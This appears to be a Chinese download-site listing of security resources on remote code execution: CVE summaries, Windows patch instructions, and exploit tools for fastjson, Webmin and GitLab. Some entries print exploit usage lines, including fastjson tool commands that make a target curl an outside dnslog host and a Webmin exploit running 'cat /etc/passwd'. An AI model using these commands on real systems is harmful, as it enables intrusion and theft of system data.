易语言远程执行代码源码,远程执行代码,GetCurrentProcessId,OpenProcess,WriteProcessMemory,取指针_整数,取指针_字节集,CloseHandle,ReadProcessMemory,API_CreateRemoteThread,API_GetModuleHandle,API_GetProcAddress,FreeLibrary,API_VirtualAllocEx,取指
1
CVE-2020-11851 ArcSight Logger上的远程执行代码漏洞(通过ArcSight管理中心) 执行摘要 Vulnerability Background ArcSight Logger是一个全面的日志管理解决方案,可通过统一和存储来自其整个组织的机器数据日志,并促进对这些数据的快速搜索和报告,减轻了合规性负担,并为安全专业人员提供了更快的法医调查。 ArcSight管理中心(ArcMC)是一个集中式安全管理中心,可通过单个界面管理ArcSight解决方案的大型部署,例如ArcSight Logger,ArcSight SmartConnectors(连接器),ArcSight FlexConnectors和ArcSight连接器设备(ConApp)。 可以通过ArcSight管理中心的备份功能(版本:2.7.1.065.0)利用此漏洞。 该备份选项通过使用使用工
2023-03-11 13:30:35 4KB
1
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。Microsoft Windows 7 SP1,Windows Server 2008 R2 SP1,Windows 8,Windows 8.1,Windows Server 2012 和Windows Server 2012 R2。
2022-11-16 18:04:25 4.69MB MS15-034HTTP.sy
1
目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034 如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这是因为此补丁依赖于补丁:KB3021910、KB2919355。只需要按顺序安装以下补丁即可:KB3021910、KB2919355、KB3042553;
2022-11-16 18:04:24 319.02MB KB2919355
1
MS12-020补丁 补丁名KB2621440 远程桌面中的漏洞可能允许远程执行代码
2022-09-02 19:01:04 1.37MB KB2621440 MS12-020
1
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
2022-03-03 11:16:10 20.58MB
1
GitLab 11.4.7 SSRF配合redis远程执行代码
2022-02-16 15:34:25 1.03MB Python开发-安全相关
1
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -d root@9460493fa985:/# passwd root Webmin>用户名= root,密码= root :high_voltage: root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d Creating network "cve-2019-15107_default" with the default driver Pullin
2021-10-24 20:22:49 448KB Python
1
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
2021-10-06 21:00:14 36.76MB Java
1
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
2021-08-11 17:33:33 1KB POC
1